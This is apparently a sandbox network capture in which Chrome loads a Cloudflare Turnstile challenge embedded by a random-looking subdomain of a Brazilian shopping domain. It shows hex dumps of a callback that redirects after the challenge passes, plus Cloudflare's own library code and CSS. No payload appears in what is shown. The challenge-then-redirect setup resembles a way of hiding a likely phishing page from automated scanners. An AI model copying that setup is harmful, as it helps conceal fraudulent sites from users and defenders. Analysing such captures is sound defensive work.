                                                                                  2025-01-15 01:58:30 UTC327INData Raw: 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 74 75 72 6e 73 74 69 6c 65 2e 72 65 6e 64 65 72 28 27 23 6d 79 57 69 64 67 65 74 27 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 73 69 74 65 6b 65 79 3a 20 27 30 78 34 41 41 41 41 41 41 41 35 4f 4b 49 7a 46 31 74 31 7a 6b 48 64 36 27 2c 0d 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 66 75 6e 63 74 69 6f 6e 28 74 6f 6b 65 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 43 68 61 6c 6c 65 6e 67 65 20 53 75 63 63 65 73 73 20 24 7b 74 6f 6b 65 6e 7d 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65
                                                                                  Data Ascii: window.onloadTurnstileCallback = function () { turnstile.render('#myWidget', { sitekey: '0x4AAAAAAA5OKIzF1t1zkHd6', callback: function(token) { console.log('Challenge Success ${token}'); window.location.hre


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.449759104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:30 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:30 UTC471INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:30 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 47521
                                                                                  Connection: close
                                                                                  accept-ranges: bytes
                                                                                  last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                  access-control-allow-origin: *
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242d8fda1f78d-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:30 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                  Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                  Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                  Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                  Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                                  Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                  Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.449760104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:30 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/ HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-Dest: iframe
                                                                                  Referer: https://aifunygg.planaltinashopping.com.br/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:30 UTC1362INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 26656
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                  cross-origin-embedder-policy: require-corp
                                                                                  cross-origin-opener-policy: same-origin
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  origin-agent-cluster: ?1
                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                  referrer-policy: same-origin
                                                                                  document-policy: js-profiling
                                                                                  2025-01-15 01:58:30 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 32 34 32 64 38 66 39 31 38 30 66 36 64 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                  Data Ascii: Server: cloudflareCF-RAY: 902242d8f9180f6d-EWRalt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:30 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                  Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                  Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                  Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                  Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
